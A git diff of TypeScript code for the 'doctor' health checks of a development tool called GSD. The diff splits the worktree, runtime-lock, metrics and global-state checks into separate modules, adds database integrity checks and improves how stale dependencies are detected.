{ - issues.push({ - severity: "warning", - code: "worktree_directory_orphaned", - scope: "project", - unitId: entry, - message: `Worktree directory ${fullPath} exists on disk but is not registered with git. Run "git worktree prune" or doctor --fix to remove it.`, - fixable: true, - }); - if (shouldFix("worktree_directory_orphaned")) { - try { - rmSync(fullPath, { recursive: true, force: true }); - fixesApplied.push(`removed orphaned worktree directory ${fullPath}`); - } catch { - fixesApplied.push(`failed to remove orphaned worktree directory ${fullPath}`); - } - } - } - } - } - } catch { - // Non-fatal — orphaned worktree directory check failed - } - - // ── Worktree lifecycle checks ────────────────────────────────────────── - // Check GSD-managed worktrees for: merged branches, stale work, dirty - // state, and unpushed commits. Only worktrees under .gsd/worktrees/. - try { - const healthStatuses = getAllWorktreeHealth(basePath); - const cwd = process.cwd(); - - for (const health of healthStatuses) { - const wt = health.worktree; - const isCwd = wt.path === cwd || cwd.startsWith(wt.path + sep); - - // Branch fully merged into main — safe to remove - if (health.mergedIntoMain) { - issues.push({ - severity: "info", - code: "worktree_branch_merged", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" (branch ${wt.branch}) is fully merged into main${health.safeToRemove ? " — safe to remove" : ""}`, - fixable: health.safeToRemove, - }); - - if (health.safeToRemove && shouldFix("worktree_branch_merged") && !isCwd) { - try { - const { removeWorktree } = await import("./worktree-manager.js"); - removeWorktree(basePath, wt.name, { deleteBranch: true, branch: wt.branch }); - fixesApplied.push(`removed merged worktree "${wt.name}" and deleted branch ${wt.branch}`); - } catch { - fixesApplied.push(`failed to remove merged worktree "${wt.name}"`); - } - } - // If merged, skip the stale/dirty/unpushed checks — they're irrelevant - continue; - } - - // Stale: no commits in N days, not merged - if (health.stale) { - const days = Math.floor(health.lastCommitAgeDays); - issues.push({ - severity: "warning", - code: "worktree_stale", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" has had no commits in ${days} day${days === 1 ? "" : "s"}`, - fixable: false, - }); - } - - // Dirty: uncommitted changes in a worktree (only flag on stale worktrees to avoid noise) - if (health.dirty && health.stale) { - issues.push({ - severity: "warning", - code: "worktree_dirty", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" has ${health.dirtyFileCount} uncommitted file${health.dirtyFileCount === 1 ? "" : "s"} and is stale`, - fixable: false, - }); - } - - // Unpushed: commits not on any remote (only flag on stale worktrees to avoid noise) - if (health.unpushedCommits > 0 && health.stale) { - issues.push({ - severity: "warning", - code: "worktree_unpushed", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" has ${health.unpushedCommits} unpushed commit${health.unpushedCommits === 1 ? "" : "s"}`, - fixable: false, - }); - } - } - } catch { - // Non-fatal — worktree lifecycle check failed - } -} - -// ── Runtime Health Checks ────────────────────────────────────────────────── -// Checks for stale crash locks, orphaned completed-units, stale hook state, -// activity log bloat, STATE.md drift, and gitignore drift. - -export async function checkRuntimeHealth( - basePath: string, - issues: DoctorIssue[], - fixesApplied: string[], - shouldFix: (code: DoctorIssueCode) => boolean, -): Promise { - const root = gsdRoot(basePath); - - // ── Stale crash lock ────────────────────────────────────────────────── - try { - const lock = readCrashLock(basePath); - if (lock) { - const alive = isLockProcessAlive(lock); - if (!alive) { - issues.push({ - severity: "error", - code: "stale_crash_lock", - scope: "project", - unitId: "project", - message: `Stale auto.lock from PID ${lock.pid} (started ${lock.startedAt}, was executing ${lock.unitType} ${lock.unitId}) — process is no longer running`, - file: ".gsd/auto.lock", - fixable: true, - }); - - if (shouldFix("stale_crash_lock")) { - clearLock(basePath); - fixesApplied.push("cleared stale auto.lock"); - } - } - } - } catch { - // Non-fatal — crash lock check failed - } - - // ── Stranded lock directory ──────────────────────────────────────────── - // proper-lockfile creates a `.gsd.lock/` directory as the OS-level lock - // mechanism. If the process was SIGKILLed or crashed hard, this directory - // can remain on disk without any live process holding it. The next session - // fails to acquire the lock until the directory is removed (#1245). - try { - const lockDir = join(dirname(root), `${basename(root)}.lock`); - if (existsSync(lockDir)) { - const statRes = statSync(lockDir); - if (statRes.isDirectory()) { - // Check if any live process actually holds this lock - const lock = readCrashLock(basePath); - const lockHolderAlive = lock ? isLockProcessAlive(lock) : false; - if (!lockHolderAlive) { - issues.push({ - severity: "error", - code: "stranded_lock_directory", - scope: "project", - unitId: "project", - message: `Stranded lock directory "${lockDir}" exists but no live process holds the session lock. This blocks new auto-mode sessions from starting.`, - file: lockDir, - fixable: true, - }); - if (shouldFix("stranded_lock_directory")) { - try { - rmSync(lockDir, { recursive: true, force: true }); - fixesApplied.push(`removed stranded lock directory ${lockDir}`); - } catch { - fixesApplied.push(`failed to remove stranded lock directory ${lockDir}`); - } - } - } - } - } - } catch { - // Non-fatal — stranded lock directory check failed - } - - // ── Stale parallel sessions ──────────────────────────────────────────── - try { - const parallelStatuses = readAllSessionStatuses(basePath); - for (const status of parallelStatuses) { - if (isSessionStale(status)) { - issues.push({ - severity: "warning", - code: "stale_parallel_session", - scope: "project", - unitId: status.milestoneId, - message: `Stale parallel session for ${status.milestoneId} (PID ${status.pid}, started ${new Date(status.startedAt).toISOString()}, last heartbeat ${new Date(status.lastHeartbeat).toISOString()}) — process is no longer running`, - file: `.gsd/parallel/${status.milestoneId}.status.json`, - fixable: true, - }); - - if (shouldFix("stale_parallel_session")) { - removeSessionStatus(basePath, status.milestoneId); - fixesApplied.push(`cleaned up stale parallel session for ${status.milestoneId}`); - } - } - } - } catch { - // Non-fatal — parallel session check failed - } - - // ── Orphaned completed-units keys ───────────────────────────────────── - try { - const completedKeysFile = join(root, "completed-units.json"); - if (existsSync(completedKeysFile)) { - const raw = readFileSync(completedKeysFile, "utf-8"); - const keys: string[] = JSON.parse(raw); - const orphaned: string[] = []; - - for (const key of keys) { - // Key format: "unitType/unitId" e.g. "execute-task/M001/S01/T01" - const slashIdx = key.indexOf("/"); - if (slashIdx === -1) continue; - const unitType = key.slice(0, slashIdx); - const unitId = key.slice(slashIdx + 1); - - // Only validate artifact-producing unit types - const { verifyExpectedArtifact } = await import("./auto-recovery.js"); - if (!verifyExpectedArtifact(unitType, unitId, basePath)) { - orphaned.push(key); - } - } - - if (orphaned.length > 0) { - issues.push({ - severity: "warning", - code: "orphaned_completed_units", - scope: "project", - unitId: "project", - message: `${orphaned.length} completed-unit key(s) reference missing artifacts: ${orphaned.slice(0, 3).join(", ")}${orphaned.length > 3 ? "..." : ""}`, - file: ".gsd/completed-units.json", - fixable: true, - }); - - if (shouldFix("orphaned_completed_units")) { - const orphanedSet = new Set(orphaned); - const remaining = keys.filter((key) => !orphanedSet.has(key)); - await saveFile(completedKeysFile, JSON.stringify(remaining)); - fixesApplied.push(`removed ${orphaned.length} orphaned completed-unit key(s)`); - } - } - } - } catch { - // Non-fatal — completed-units check failed - } - - // ── Stale hook state ────────────────────────────────────────────────── - try { - const hookStateFile = join(root, "hook-state.json"); - if (existsSync(hookStateFile)) { - const raw = readFileSync(hookStateFile, "utf-8"); - const state = JSON.parse(raw); - const hasCycleCounts = state.cycleCounts && typeof state.cycleCounts === "object" - && Object.keys(state.cycleCounts).length > 0; - - // Only flag if there are actual cycle counts AND no auto-mode is running - if (hasCycleCounts) { - const lock = readCrashLock(basePath); - const autoRunning = lock ? isLockProcessAlive(lock) : false; - - if (!autoRunning) { - issues.push({ - severity: "info", - code: "stale_hook_state", - scope: "project", - unitId: "project", - message: `hook-state.json has ${Object.keys(state.cycleCounts).length} residual cycle count(s) from a previous session`, - file: ".gsd/hook-state.json", - fixable: true, - }); - - if (shouldFix("stale_hook_state")) { - const { clearPersistedHookState } = await import("./post-unit-hooks.js"); - clearPersistedHookState(basePath); - fixesApplied.push("cleared stale hook-state.json"); - } - } - } - } - } catch { - // Non-fatal — hook state check failed - } - - // ── Activity log bloat ──────────────────────────────────────────────── - try { - const activityDir = join(root, "activity"); - if (existsSync(activityDir)) { - const files = readdirSync(activityDir); - let totalSize = 0; - for (const f of files) { - try { - totalSize += statSync(join(activityDir, f)).size; - } catch { - // stat failed — skip - } - } - - const totalMB = totalSize / (1024 * 1024); - const BLOAT_FILE_THRESHOLD = 500; - const BLOAT_SIZE_MB = 100; - - if (files.length > BLOAT_FILE_THRESHOLD || totalMB > BLOAT_SIZE_MB) { - issues.push({ - severity: "warning", - code: "activity_log_bloat", - scope: "project", - unitId: "project", - message: `Activity logs: ${files.length} files, ${totalMB.toFixed(1)}MB (thresholds: ${BLOAT_FILE_THRESHOLD} files / ${BLOAT_SIZE_MB}MB)`, - file: ".gsd/activity/", - fixable: true, - }); - - if (shouldFix("activity_log_bloat")) { - const { pruneActivityLogs } = await import("./activity-log.js"); - pruneActivityLogs(activityDir, 7); // 7-day retention - fixesApplied.push("pruned activity logs (7-day retention)"); - } - } - } - } catch { - // Non-fatal — activity log check failed - } - - // ── STATE.md health ─────────────────────────────────────────────────── - try { - const stateFilePath = resolveGsdRootFile(basePath, "STATE"); - const milestonesPath = milestonesDir(basePath); - - if (existsSync(milestonesPath)) { - if (!existsSync(stateFilePath)) { - issues.push({ - severity: "warning", - code: "state_file_missing", - scope: "project", - unitId: "project", - message: "STATE.md is missing — state display will not work", - file: ".gsd/STATE.md", - fixable: true, - }); - - if (shouldFix("state_file_missing")) { - const state = await deriveState(basePath); - await saveFile(stateFilePath, buildStateMarkdownForCheck(state)); - fixesApplied.push("created STATE.md from derived state"); - } - } else { - // Check if STATE.md is stale by comparing active milestone/slice/phase - const currentContent = readFileSync(stateFilePath, "utf-8"); - const state = await deriveState(basePath); - const freshContent = buildStateMarkdownForCheck(state); - - // Extract key fields for comparison — don't compare full content - // since timestamp/formatting differences are normal - const extractFields = (content: string) => { - const milestone = content.match(/\*\*Active Milestone:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; - const slice = content.match(/\*\*Active Slice:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; - const phase = content.match(/\*\*Phase:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; - return { milestone, slice, phase }; - }; - - const current = extractFields(currentContent); - const fresh = extractFields(freshContent); - - if (current.milestone !== fresh.milestone || current.slice !== fresh.slice || current.phase !== fresh.phase) { - issues.push({ - severity: "warning", - code: "state_file_stale", - scope: "project", - unitId: "project", - message: `STATE.md is stale — shows "${current.phase}" but derived state is "${fresh.phase}"`, - file: ".gsd/STATE.md", - fixable: true, - }); - - if (shouldFix("state_file_stale")) { - await saveFile(stateFilePath, freshContent); - fixesApplied.push("rebuilt STATE.md from derived state"); - } - } - } - } - } catch { - // Non-fatal — STATE.md check failed - } - - // ── Gitignore drift ─────────────────────────────────────────────────── - try { - const gitignorePath = join(basePath, ".gitignore"); - if (existsSync(gitignorePath) && nativeIsRepo(basePath)) { - const content = readFileSync(gitignorePath, "utf-8"); - const existingLines = new Set( - content.split("\n").map(l => l.trim()).filter(l => l && !l.startsWith("#")), - ); - - // Check for critical runtime patterns that must be present - const criticalPatterns = [ - ".gsd/activity/", - ".gsd/runtime/", - ".gsd/auto.lock", - ".gsd/gsd.db", - ".gsd/completed-units.json", - ]; - - // If blanket .gsd/ or .gsd is present, all patterns are covered - const hasBlanketIgnore = existingLines.has(".gsd/") || existingLines.has(".gsd"); - - if (!hasBlanketIgnore) { - const missing = criticalPatterns.filter(p => !existingLines.has(p)); - if (missing.length > 0) { - issues.push({ - severity: "warning", - code: "gitignore_missing_patterns", - scope: "project", - unitId: "project", - message: `${missing.length} critical GSD runtime pattern(s) missing from .gitignore: ${missing.join(", ")}`, - file: ".gitignore", - fixable: true, - }); - - if (shouldFix("gitignore_missing_patterns")) { - ensureGitignore(basePath); - fixesApplied.push("added missing GSD runtime patterns to .gitignore"); - } - } - } - } - } catch { - // Non-fatal — gitignore check failed - } - - // ── External state symlink health ────────────────────────────────────── - try { - const localGsd = join(basePath, ".gsd"); - if (existsSync(localGsd)) { - const stat = lstatSync(localGsd); - - // Check for .gsd.migrating (failed migration) - const migratingPath = join(basePath, ".gsd.migrating"); - if (existsSync(migratingPath)) { - issues.push({ - severity: "error", - code: "failed_migration", - scope: "project", - unitId: "project", - message: "Found .gsd.migrating — a previous external state migration failed. State may be incomplete.", - file: ".gsd.migrating", - fixable: true, - }); - - if (shouldFix("failed_migration")) { - if (recoverFailedMigration(basePath)) { - fixesApplied.push("recovered failed migration (.gsd.migrating → .gsd)"); - } - } - } - - // Check symlink target exists - if (stat.isSymbolicLink()) { - try { - realpathSync(localGsd); - } catch { - issues.push({ - severity: "error", - code: "broken_symlink", - scope: "project", - unitId: "project", - message: ".gsd symlink target does not exist. External state directory may have been deleted.", - file: ".gsd", - fixable: false, - }); - } - } - } - } catch { - // Non-fatal — external state check failed - } - - // ── Metrics ledger integrity ─────────────────────────────────────────── - try { - const metricsPath = join(root, "metrics.json"); - if (existsSync(metricsPath)) { - try { - const raw = readFileSync(metricsPath, "utf-8"); - const ledger = JSON.parse(raw); - if (ledger.version !== 1 || !Array.isArray(ledger.units)) { - issues.push({ - severity: "warning", - code: "metrics_ledger_corrupt", - scope: "project", - unitId: "project", - message: "metrics.json has an unexpected structure (version !== 1 or units is not an array) — metrics data may be unreliable", - file: ".gsd/metrics.json", - fixable: false, - }); - } - } catch { - issues.push({ - severity: "warning", - code: "metrics_ledger_corrupt", - scope: "project", - unitId: "project", - message: "metrics.json is not valid JSON — metrics data may be corrupt", - file: ".gsd/metrics.json", - fixable: false, - }); - } - } - } catch { - // Non-fatal — metrics check failed - } - - // ── Metrics ledger bloat ────────────────────────────────────────────── - // The metrics ledger has no TTL and grows by one entry per completed unit. - // At 50 units/day a project can accumulate tens of thousands of entries over - // months of use. Prune to the newest 1500 when the threshold is exceeded. - try { - const metricsFilePath = join(root, "metrics.json"); - if (existsSync(metricsFilePath)) { - try { - const raw = readFileSync(metricsFilePath, "utf-8"); - const parsed = JSON.parse(raw); - const BLOAT_UNITS_THRESHOLD = 2000; - if (parsed.version === 1 && Array.isArray(parsed.units) && parsed.units.length > BLOAT_UNITS_THRESHOLD) { - const fileSizeMB = (statSync(metricsFilePath).size / (1024 * 1024)).toFixed(1); - issues.push({ - severity: "warning", - code: "metrics_ledger_bloat", - scope: "project", - unitId: "project", - message: `metrics.json has ${parsed.units.length} unit entries (${fileSizeMB}MB) — threshold is ${BLOAT_UNITS_THRESHOLD}. Run /gsd doctor --fix to prune to the newest 1500 entries.`, - file: ".gsd/metrics.json", - fixable: true, - }); - if (shouldFix("metrics_ledger_bloat")) { - const { pruneMetricsLedger } = await import("./metrics.js"); - const removed = pruneMetricsLedger(basePath, 1500); - fixesApplied.push(`pruned metrics ledger: removed ${removed} oldest entries (${parsed.units.length - removed} remain)`); - } - } - } catch { - // JSON parse failed — already handled by the integrity check above - } - } - } catch { - // Non-fatal — metrics bloat check failed - } - - // ── Large planning file detection ────────────────────────────────────── - // Files over 100KB can cause LLM context pressure. Report the worst offenders. - try { - const MAX_FILE_BYTES = 100 * 1024; // 100KB - const milestonesPath = milestonesDir(basePath); - if (existsSync(milestonesPath)) { - const largeFiles: Array<{ path: string; sizeKB: number }> = []; - function scanForLargeFiles(dir: string, depth = 0): void { - if (depth > 6) return; - try { - for (const entry of readdirSync(dir)) { - const full = join(dir, entry); - try { - const s = statSync(full); - if (s.isDirectory()) { scanForLargeFiles(full, depth + 1); continue; } - if (entry.endsWith(".md") && s.size > MAX_FILE_BYTES) { - largeFiles.push({ path: full.replace(basePath + "/", ""), sizeKB: Math.round(s.size / 1024) }); - } - } catch { /* skip entry */ } - } - } catch { /* skip dir */ } - } - scanForLargeFiles(milestonesPath); - if (largeFiles.length > 0) { - largeFiles.sort((a, b) => b.sizeKB - a.sizeKB); - const worst = largeFiles[0]!; - issues.push({ - severity: "warning", - code: "large_planning_file", - scope: "project", - unitId: "project", - message: `${largeFiles.length} planning file(s) exceed 100KB — largest: ${worst.path} (${worst.sizeKB}KB). Large files cause LLM context pressure.`, - file: worst.path, - fixable: false, - }); - } - } - } catch { - // Non-fatal — large file scan failed - } - - // ── Snapshot ref bloat ──────────────────────────────────────────────── - // refs/gsd/snapshots/ accumulate over time. Prune to newest 5 per label - // when total count exceeds threshold. - try { - if (nativeIsRepo(basePath)) { - const refs = nativeForEachRef(basePath, "refs/gsd/snapshots/"); - if (refs.length > 50) { - issues.push({ - severity: "warning", - code: "snapshot_ref_bloat", - scope: "project", - unitId: "project", - message: `${refs.length} snapshot refs found under refs/gsd/snapshots/ — pruning to newest 5 per label will reclaim git storage`, - fixable: true, - }); - - if (shouldFix("snapshot_ref_bloat")) { - const byLabel = new Map(); - for (const ref of refs) { - const parts = ref.split("/"); - const label = parts.slice(0, -1).join("/"); - if (!byLabel.has(label)) byLabel.set(label, []); - byLabel.get(label)!.push(ref); - } - let pruned = 0; - for (const [, labelRefs] of byLabel) { - const sorted = labelRefs.sort(); - for (const old of sorted.slice(0, -5)) { - try { - nativeUpdateRef(basePath, old); - pruned++; - } catch { /* skip */ } - } - } - if (pruned > 0) { - fixesApplied.push(`pruned ${pruned} old snapshot ref(s)`); - } - } - } - } - } catch { - // Non-fatal — snapshot ref check failed - } -} - -/** - * Build STATE.md markdown content from derived state. - * Local helper used by checkRuntimeHealth for STATE.md drift detection and repair. - */ -function buildStateMarkdownForCheck(state: Awaited>): string { - const lines: string[] = []; - lines.push("# GSD State", ""); - - const activeMilestone = state.activeMilestone - ? `${state.activeMilestone.id}: ${state.activeMilestone.title}` - : "None"; - const activeSlice = state.activeSlice - ? `${state.activeSlice.id}: ${state.activeSlice.title}` - : "None"; - - lines.push(`**Active Milestone:** ${activeMilestone}`); - lines.push(`**Active Slice:** ${activeSlice}`); - lines.push(`**Phase:** ${state.phase}`); - if (state.requirements) { - lines.push(`**Requirements Status:** ${state.requirements.active} active · ${state.requirements.validated} validated · ${state.requirements.deferred} deferred · ${state.requirements.outOfScope} out of scope`); - } - lines.push(""); - lines.push("## Milestone Registry"); - - for (const entry of state.registry) { - const glyph = entry.status === "complete" ? "\u2705" : entry.status === "active" ? "\uD83D\uDD04" : entry.status === "parked" ? "\u23F8\uFE0F" : "\u2B1C"; - lines.push(`- ${glyph} **${entry.id}:** ${entry.title}`); - } - - lines.push(""); - lines.push("## Recent Decisions"); - if (state.recentDecisions.length > 0) { - for (const decision of state.recentDecisions) lines.push(`- ${decision}`); - } else { - lines.push("- None recorded"); - } - - lines.push(""); - lines.push("## Blockers"); - if (state.blockers.length > 0) { - for (const blocker of state.blockers) lines.push(`- ${blocker}`); - } else { - lines.push("- None"); - } - - lines.push(""); - lines.push("## Next Action"); - lines.push(state.nextAction || "None"); - lines.push(""); - - return lines.join("\n"); -} - -// ── Global Health Checks ──────────────────────────────────────────────────── -// Cross-project checks that scan ~/.gsd/ rather than a specific project directory. - -/** - * Check for orphaned project state directories in ~/.gsd/projects/. - * - * A project directory is orphaned when its recorded gitRoot no longer exists - * on disk — the repo was deleted, moved, or the external drive was unmounted. - * These directories accumulate silently and waste disk space. - * - * Severity: info — orphaned state is harmless but takes disk space. - * Fixable: yes — rmSync the directory. Never auto-fixed at fixLevel="task". - */ -export async function checkGlobalHealth( - issues: DoctorIssue[], - fixesApplied: string[], - shouldFix: (code: DoctorIssueCode) => boolean, -): Promise { - try { - const projectsDir = externalProjectsRoot(); - - if (!existsSync(projectsDir)) return; - - let entries: string[]; - try { - entries = readdirSync(projectsDir, { withFileTypes: true }) - .filter(e => e.isDirectory()) - .map(e => e.name); - } catch { - return; // Can't read directory — skip - } - - if (entries.length === 0) return; - - const orphaned: Array<{ hash: string; gitRoot: string; remoteUrl: string }> = []; - let unknownCount = 0; - - for (const hash of entries) { - const dirPath = join(projectsDir, hash); - const meta = readRepoMeta(dirPath); - if (!meta) { - unknownCount++; - continue; - } - if (!existsSync(meta.gitRoot)) { - orphaned.push({ hash, gitRoot: meta.gitRoot, remoteUrl: meta.remoteUrl }); - } - } - - if (orphaned.length === 0) return; - - const labels = orphaned.slice(0, 3).map(o => o.gitRoot).join(", "); - const overflow = orphaned.length > 3 ? ` (+${orphaned.length - 3} more)` : ""; - const unknownNote = unknownCount > 0 ? ` — ${unknownCount} additional director${unknownCount === 1 ? "y" : "ies"} have no metadata yet (open those repos once to register them)` : ""; - - issues.push({ - severity: "info", - code: "orphaned_project_state", - scope: "project", - unitId: "global", - message: `${orphaned.length} orphaned GSD project state director${orphaned.length === 1 ? "y" : "ies"} in ${projectsDir} whose git root no longer exists: ${labels}${overflow}${unknownNote}. Run /gsd cleanup projects to audit or /gsd cleanup projects --fix to reclaim disk space.`, - file: projectsDir, - fixable: true, - }); - - if (shouldFix("orphaned_project_state")) { - let removed = 0; - for (const { hash } of orphaned) { - try { - rmSync(join(projectsDir, hash), { recursive: true, force: true }); - removed++; - } catch { - // Individual removal failure is non-fatal — continue with remaining - } - } - fixesApplied.push(`removed ${removed} orphaned project state director${removed === 1 ? "y" : "ies"} from ${projectsDir}`); - } - } catch { - // Non-fatal — global health check must not block per-project doctor - } -} +// Re-exports for backward compatibility +export { checkGitHealth } from "./doctor-git-checks.js"; +export { checkRuntimeHealth } from "./doctor-runtime-checks.js"; +export { checkGlobalHealth } from "./doctor-global-checks.js"; +export { checkEngineHealth } from "./doctor-engine-checks.js"; diff --git a/src/resources/extensions/gsd/doctor-engine-checks.ts b/src/resources/extensions/gsd/doctor-engine-checks.ts new file mode 100644 index 000000000..8b74dcac4 --- /dev/null +++ b/src/resources/extensions/gsd/doctor-engine-checks.ts @@ -0,0 +1,182 @@ +import { existsSync, statSync } from "node:fs"; +import { join } from "node:path"; + +import type { DoctorIssue } from "./doctor-types.js"; +import { isDbAvailable, _getAdapter } from "./gsd-db.js"; +import { resolveMilestoneFile } from "./paths.js"; +import { deriveState } from "./state.js"; +import { readEvents } from "./workflow-events.js"; +import { renderAllProjections } from "./workflow-projections.js"; + +export async function checkEngineHealth( + basePath: string, + issues: DoctorIssue[], + fixesApplied: string[], +): Promise { + // ── DB constraint violation detection (full doctor only, not pre-dispatch per D-10) ── + try { + if (isDbAvailable()) { + const adapter = _getAdapter()!; + + // a. Orphaned tasks (task.slice_id points to non-existent slice) + try { + const orphanedTasks = adapter + .prepare( + `SELECT t.id, t.slice_id, t.milestone_id + FROM tasks t + LEFT JOIN slices s ON t.milestone_id = s.milestone_id AND t.slice_id = s.id + WHERE s.id IS NULL`, + ) + .all() as Array<{ id: string; slice_id: string; milestone_id: string }>; + + for (const row of orphanedTasks) { + issues.push({ + severity: "error", + code: "db_orphaned_task", + scope: "task", + unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`, + message: `Task ${row.id} references slice ${row.slice_id} in milestone ${row.milestone_id} but no such slice exists in the database`, + fixable: false, + }); + } + } catch { + // Non-fatal — orphaned task check failed + } + + // b. Orphaned slices (slice.milestone_id points to non-existent milestone) + try { + const orphanedSlices = adapter + .prepare( + `SELECT s.id, s.milestone_id + FROM slices s + LEFT JOIN milestones m ON s.milestone_id = m.id + WHERE m.id IS NULL`, + ) + .all() as Array<{ id: string; milestone_id: string }>; + + for (const row of orphanedSlices) { + issues.push({ + severity: "error", + code: "db_orphaned_slice", + scope: "slice", + unitId: `${row.milestone_id}/${row.id}`, + message: `Slice ${row.id} references milestone ${row.milestone_id} but no such milestone exists in the database`, + fixable: false, + }); + } + } catch { + // Non-fatal — orphaned slice check failed + } + + // c. Tasks marked complete without summaries + try { + const doneTasks = adapter + .prepare( + `SELECT id, slice_id, milestone_id FROM tasks + WHERE status = 'done' AND (summary IS NULL OR summary = '')`, + ) + .all() as Array<{ id: string; slice_id: string; milestone_id: string }>; + + for (const row of doneTasks) { + issues.push({ + severity: "warning", + code: "db_done_task_no_summary", + scope: "task", + unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`, + message: `Task ${row.id} is marked done but has no summary in the database`, + fixable: false, + }); + } + } catch { + // Non-fatal — done-task-no-summary check failed + } + + // d. Duplicate entity IDs (safety check) + try { + const dupMilestones = adapter + .prepare("SELECT id, COUNT(*) as cnt FROM milestones GROUP BY id HAVING cnt > 1") + .all() as Array<{ id: string; cnt: number }>; + for (const row of dupMilestones) { + issues.push({ + severity: "error", + code: "db_duplicate_id", + scope: "milestone", + unitId: row.id, + message: `Duplicate milestone ID "${row.id}" appears ${row.cnt} times in the database`, + fixable: false, + }); + } + + const dupSlices = adapter + .prepare("SELECT id, milestone_id, COUNT(*) as cnt FROM slices GROUP BY id, milestone_id HAVING cnt > 1") + .all() as Array<{ id: string; milestone_id: string; cnt: number }>; + for (const row of dupSlices) { + issues.push({ + severity: "error", + code: "db_duplicate_id", + scope: "slice", + unitId: `${row.milestone_id}/${row.id}`, + message: `Duplicate slice ID "${row.id}" in milestone ${row.milestone_id} appears ${row.cnt} times`, + fixable: false, + }); + } + + const dupTasks = adapter + .prepare("SELECT id, slice_id, milestone_id, COUNT(*) as cnt FROM tasks GROUP BY id, slice_id, milestone_id HAVING cnt > 1") + .all() as Array<{ id: string; slice_id: string; milestone_id: string; cnt: number }>; + for (const row of dupTasks) { + issues.push({ + severity: "error", + code: "db_duplicate_id", + scope: "task", + unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`, + message: `Duplicate task ID "${row.id}" in slice ${row.slice_id} appears ${row.cnt} times`, + fixable: false, + }); + } + } catch { + // Non-fatal — duplicate ID check failed + } + } + } catch { + // Non-fatal — DB constraint checks failed entirely + } + + // ── Projection drift detection ────────────────────────────────────────── + // If the DB is available, check whether markdown projections are stale + // relative to the event log and re-render them. + try { + if (isDbAvailable()) { + const eventLogPath = join(basePath, ".gsd", "event-log.jsonl"); + const events = readEvents(eventLogPath); + if (events.length > 0) { + const lastEventTs = new Date(events[events.length - 1]!.ts).getTime(); + const state = await deriveState(basePath); + for (const milestone of state.registry) { + if (milestone.status === "complete") continue; + const roadmapPath = resolveMilestoneFile(basePath, milestone.id, "ROADMAP"); + if (!roadmapPath || !existsSync(roadmapPath)) { + try { + await renderAllProjections(basePath, milestone.id); + fixesApplied.push(`re-rendered missing projections for ${milestone.id}`); + } catch { + // Non-fatal — projection re-render failed + } + continue; + } + const projectionMtime = statSync(roadmapPath).mtimeMs; + if (lastEventTs > projectionMtime) { + try { + await renderAllProjections(basePath, milestone.id); + fixesApplied.push(`re-rendered stale projections for ${milestone.id}`); + } catch { + // Non-fatal — projection re-render failed + } + } + } + } + } + } catch { + // Non-fatal — projection drift check must never block doctor + } +} diff --git a/src/resources/extensions/gsd/doctor-environment.ts b/src/resources/extensions/gsd/doctor-environment.ts index 61f61cd85..563afdbb4 100644 --- a/src/resources/extensions/gsd/doctor-environment.ts +++ b/src/resources/extensions/gsd/doctor-environment.ts @@ -37,6 +37,29 @@ const CMD_TIMEOUT = 5_000; // ── Helpers ──────────────────────────────────────────────────────────────── +/** Worktree sentinel — path segment that marks an auto-worktree directory. */ +const WORKTREE_PATH_SEGMENT = `${join(".gsd", "worktrees")}/`; + +/** + * Resolve the project root when running inside a `.gsd/worktrees//` + * auto-worktree. Returns `null` if not in a worktree. + * + * Detection order: + * 1. `GSD_WORKTREE` env var (set by the worktree launcher) + * 2. `.gsd/worktrees/` segment in basePath + */ +function resolveWorktreeProjectRoot(basePath: string): string | null { + const envRoot = process.env.GSD_WORKTREE; + if (envRoot) return envRoot; + + const normalised = basePath.replace(/\\/g, "/"); + const idx = normalised.indexOf(WORKTREE_PATH_SEGMENT.replace(/\\/g, "/")); + if (idx === -1) return null; + + // Everything before `.gsd/worktrees/` is the project root + return basePath.slice(0, idx); +} + function tryExec(cmd: string, cwd: string): string | null { try { return execSync(cmd, { @@ -111,6 +134,14 @@ function checkDependenciesInstalled(basePath: string): EnvironmentCheckResult | const nodeModules = join(basePath, "node_modules"); if (!existsSync(nodeModules)) { + // In auto-worktrees node_modules is absent by design — the worktree + // symlinks to (or expects) the project root's copy. Fall back to + // checking the project root before reporting an error (#2303). + const projectRoot = resolveWorktreeProjectRoot(basePath); + if (projectRoot && existsSync(join(projectRoot, "node_modules"))) { + return { name: "dependencies", status: "ok", message: "Dependencies installed (project root)" }; + } + return { name: "dependencies", status: "error", @@ -118,21 +149,44 @@ function checkDependenciesInstalled(basePath: string): EnvironmentCheckResult | }; } - // Check if lockfile is newer than node_modules - const lockfiles = ["package-lock.json", "yarn.lock", "pnpm-lock.yaml"]; - for (const lockfile of lockfiles) { - const lockPath = join(basePath, lockfile); + // Check if lockfile is newer than the last install. + // + // Each package manager writes a metadata marker inside node_modules on + // every install. Comparing the lockfile mtime against the marker is + // reliable; comparing against the node_modules *directory* mtime is not, + // because directory mtime only changes when entries are added or removed + // — not when files inside it are updated. (#1974) + const lockfiles: Array<{ lock: string; markers: string[] }> = [ + { lock: "package-lock.json", markers: ["node_modules/.package-lock.json"] }, + { lock: "yarn.lock", markers: ["node_modules/.yarn-integrity"] }, + { lock: "pnpm-lock.yaml", markers: ["node_modules/.modules.yaml"] }, + ]; + + for (const { lock, markers } of lockfiles) { + const lockPath = join(basePath, lock); if (!existsSync(lockPath)) continue; try { const lockMtime = statSync(lockPath).mtimeMs; - const nmMtime = statSync(nodeModules).mtimeMs; - if (lockMtime > nmMtime) { + // Prefer the package manager's marker file; fall back to directory mtime + // only when no marker exists (e.g., manually created node_modules). + let installMtime = 0; + for (const marker of markers) { + const markerPath = join(basePath, marker); + if (existsSync(markerPath)) { + installMtime = Math.max(installMtime, statSync(markerPath).mtimeMs); + } + } + if (installMtime === 0) { + installMtime = statSync(nodeModules).mtimeMs; + } + + if (lockMtime > installMtime) { return { name: "dependencies", status: "warning", - message: `${lockfile} is newer than node_modules — dependencies may be stale`, + message: `${lock} is newer than node_modules — dependencies may be stale`, detail: `Run npm install / yarn / pnpm install to update`, }; } diff --git a/src/resources/extensions/gsd/doctor-git-checks.ts b/src/resources/extensions/gsd/doctor-git-checks.ts new file mode 100644 index 000000000..36b2eb5eb --- /dev/null +++ 